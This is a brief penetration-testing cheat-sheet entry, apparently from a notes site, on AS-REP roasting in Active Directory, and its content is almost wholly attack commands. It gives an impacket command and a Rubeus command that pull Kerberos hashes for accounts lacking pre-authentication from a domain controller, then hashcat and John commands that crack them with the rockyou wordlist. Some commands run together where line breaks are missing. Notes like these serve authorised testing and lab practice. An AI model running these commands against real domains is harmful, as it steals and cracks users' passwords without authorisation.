ASP-REP Roasting
Linux
impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $ip 'htb.local/'Windows
.\Rubeus.exe asreproastCracking
sudo hashcat -m 18200 ASREProastables.txt -r /usr/share/hashcat/rules/best64.rule --forcejohn --wordlist=/usr/share/wordlists/rockyou.txt ASREProastables.txtLast updated